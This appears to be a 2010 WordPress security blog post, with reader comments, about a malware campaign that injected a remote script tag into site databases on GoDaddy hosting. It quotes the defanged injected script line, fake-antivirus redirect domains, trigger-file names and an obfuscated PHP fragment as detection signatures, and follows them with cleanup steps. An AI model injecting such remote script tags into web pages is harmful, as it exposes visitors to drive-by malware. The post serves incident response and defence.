On December 22, 2010, we received several reports that a new malware attack (acrossuniverseitbenet) has infected WordPress sites hosted at GoDaddy and possibly other hosting providers.
The malware script injected is as follows:
(I have put spaces in the url below for your protection so you can't click to open the url.)
<script src="http:// acrossuniverseitbenet .com/js.php?kk=10" > </script>
The worst part about this virus is it's much harder to clean. The malicious hackers have stepped it up a notch and decided to infect the WordPress database and not just server files. The above script is injected inside every single page and posts inside the database (wp_posts table).
This malicious script redirects website visitors to various sites hosting "Fake AV" websites and some are zero-day attacks. A zero-day attack means that anti-virus programs may not yet have their definitions updated and your computer can become infected even with up-to-date software.
Some of the Fake AV websites that the acrossuniverseitbenet redirects to are:
(I have put spaces in the urls so you can't click them for your protection.)
- ww23.smartsuite-4u .in
- ww3.top-s-can-foru .in
- www1.top-only-master .in
Here's a screen shot of one of the viruses caught by my AVG program:
Today, my computer was attacked three times and my AVG and MalwareBytes did not catch two of the viruses and I had to do a system restore to an earlier date.
I did not make a screen shot of the actual attacks, but it looked very similar to this:
As you can see by the above image, this can easily fool people into thinking they are looking at a folder on their Windows computer and not a web browser (look at the top where you can see the URL). It moves extremely fast and starts downloading tons of infectious files to your computer.
This Fake AV is very dangerous and can cripple your visitors computers. It is strongly advised that you put your website in maintenance mode immediately until it is fixed.
How to safely put your WordPress Blog in Maintenance Mode:
- Rename your root index.php file to something else (for example: index-hold.php).
- Upload a "Down for Maintenance" index.html page to your root directory.
- Rename your wp-config.php file to something else so no other pages connect to the infected database (for example: wp-config-hold.php).
- Clear your cache and cookies.
- Visit your website's home page to make sure you can see the "Down for Maintenance" page.
If you do not have a blank index page, please feel free to use mine. All you have to do is unzip it and upload it to your root directory where your wp-config.php file is.
Important: Make sure you rename it to index.html so that your server recognizes it for the home page.
Server Files Found:
There have been numerous "mystery" files found on infected websites that were uploaded on November 10, 2010. We believe these were trigger files that were set to "go off" today.
An example file name is sdfssdf_dfsdf.php
Be sure you look through your server files for these trigger files and remove them ASAP.
Contact Your Hosting Company
If you're hosted with GoDaddy, please fill out a support ticket with their security team here.
If you are hosting with another hosting provider, please contact them as well.
How many WordPress sites are infected with acrossuniverseitbenet?
At this time, the number of WordPress sites hacked or the number of hosting providers affected is unclear.
We have been working with GoDaddy directly to help resolve this issue and will keep you updated as we receive more information. Any updates will be put on this blog post, so be sure to check back often. If you need help, feel free to contact us.
We need your feedback!
If you're site been infected with this malware attack? If so, are you on GoDaddy or with another hosting provider? Have you found any other redirect scripts? Please let us know by leaving a comment below.
Securely yours,
Regina Smola
Follow me on Twitter
Follow WPSecurityLock on Twitter
UPDATE: 12/22/2010 at 5pm CST:
Currently, we are unable to connect to any site affected on GoDaddy's server infected with this malware via FTP/SFTP. Getting a critical error - 550 Login authentication failed. Could not connect to the server. We had to change the FTP password to get in again. Not sure if it was a malicious hacker that changed it or GoDaddy for protection.
UPDATE 12/22/2010 at 8:27PM CST:
Just found another trigger file on a infected website. File name fritz_rather.php. Uploaded 11/13/2010 at 6:41am server time. This file must be time activate to go off today when it started redirecting site this morning.
You should search your server files for any files that have suspicious names and also do a search for the following to identify any malicious code:
<'.'?php /**/ $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x6
And
global $totalinjected;
The malicious code could have all or some of the above. They should be deleted immediately.
UPDATE 12/22/2010 at 9:39pm CST:
As you know we are working hard to fix as many websites as possible. Our good friends over at Sucuri have agreed to take on our overflow sites and get your sites fixed as soon as possible (generally within 4 hours).
You can get your hacked WordPress blog fixed here:
* http://www.wpsecuritylock.com/sucuri.
Open the above URL and scroll down the the "Have a single site with malware?" and click the "Sign Up" button. And be sure to check out their Sucuri Web Integrity Monitor services for your website. We use it and recommend it to all our customers.
Don't let your customers tell you your site's hacked, let Sucuri alert you instead.
*Denotes our affiliate link, see our Disclosure.
UPDATE 12/22/2010 at 10:30pm CST:
Just had a great conversation with Willis. He has written a script for you to fix your infected WordPress databases. Be sure to read his instructions and download the fix here:
http://newmusicreviews.net/sqlquery.txt
Thanks again Willis. Your Rock!
Important: Be sure you make a backup of your database before running the above fix.
Once the database is fixed, be sure to changed your ftp, Go Daddy, wp-admin and database passwords. (You'll have to update the new database password in your wp-config.php file).
And be sure to change your Authentication Unique Keys and Salts (around line 45) of your wp-config.php file to reset the "crackers" cookies. (Crackers is old school in honor of Robert Nelson)
And double check your server for any mystery files with malicious script.
UPDATE 12/23/2010 2:50PM
GoDaddy has released a Security Update on their community blog regarding this malware attack. Read "Security Update: Malware Affecting Some Databases."
About Regina Smola
Download the "7 Plugins for WordPress Security" report and get WordPress Security news to stay informed and avoid getting hacked.
GoDaddy is suppressing the obvious, and why should they care if it creates a need for people to spend more money. Also, what's obvious to me here is that everyone needs to be aware the number one attack method is for bot herders and exploit attackers to manifest scripts into your .js (javascript) files via open ftp connections.
Don't use ftp, use a "Shell" or at a minimum sftp. sftp is either something your host offers free or as an add-on. Not having it is quite costly especially if you run multiple blogs BECAUSE: Once you have an "open" ftp connection established with FileZilla or whoever you FTP client is, the intercepting bots can install the malicious scripts (usually a big chunk of code starting with "<try" at the bottom of the file) in all your blogs running on that server simultaneously in hundreds of places. Icky stuff indeed.
The best fix and this is NOT for the meek or unfamiliar - do this: ZIP your entire site via your file control panel and download it to your computer. DO NOT use ftp and DO NOT unzip the files. Scan them with AVAST or another reputable scanner. It will tell you the exact locations of all the bad scripts whether they be in wp-contents, plugins, themes, includes etc. Then you can easily go into each file using your online editor and simply erase the script or replace it with a new clean copy.
Not an easy process, but if you've ever had 10 blogs infected at once, you will be better prepared in the future to never have this happen again.
hope this helps,
stu
Hi Stu,
Excellent advice! Thanks so much for your comment and sharing.
I never use anything less than SFTP unless the site I'm working doesn't have it enabled. Then I advise my client to have it enabled by their host or move to a hosting provider that has it.
What's amazing to me is how many sites I work on that are hacked, still on PHP 4, WordPress 2.8x, 15+ outdated plugins, a username as admin, and a password of password123 for everything.
All we can do is spread the word on how to be safe and give advice, like your info about scanning site files with AVAST and using SFTP as a minimum. Thanks again!
My pleasure Regina.
If someone takes the time to do a real self hosted WordPress install from scratch, they obviously made the effort to understand that it's just a little harder than falling off a log - but you gotta hand it to them, they wanted to get online and blog - which is the beauty of the software - staying up to date with it is a matter that can trail behind after they made the initial effort. Then of course you have the fantastico and other script installers which may seem easier but can cause headaches down the road . . . of which you are well aware.
By the time I go through 20 client blogs in a week of update work, I sit back and say, "Ok, which one did I miss". lol
See ya on the other side.
Stu
You are so right, Stu. I love WordPress, and yes there are updates to do, but that happens with any content management system. A little elbow grease goes a long way.
Maybe this is a topic for another thread, what security issues have you seen with installing WP with software installers like Fantastico, SimpleScripts, Softaculous etc?
Follow @royrandolph on Twitter
Hi Roy,
Thanks for your question. There are security risks using auto installers. I will create a post tomorrow showing the risks of using auto installers for WordPress.
Just added my review of why not to use auto installers, like Fantastico. You can read it here.
My site was one that was affected by this attack. I host with GoDaddy and when I first contacted them about the problem, they denied that there was a problem. I immediately signed up with Securi and they cleaned my site. When I called GoDaddy back about it and filled out a support ticket to at least let them know that my site was affected, I was told that security of my site was my problem, not theirs. I am looking to change hosting companies now.
Good thinking BikeCatGal, I would suggest HostGator. Only thing GoDaddy is good for is registration of domain names and even then there are probably cheaper deals available
Follow @nar321 on Twitter
I second that Robert! I've never had a problem with my domains being registered at GoDaddy. Plus, the domain manager interface is great. I also host with HG.
Yikes! Not a very good response, but ultimately you're responsible to have a secure website for your visitors, which includes hosting it somewhere that's safe. A good one is HostGator (that's my affiliate link). To save, enter in our coupon code: wpsecuritylock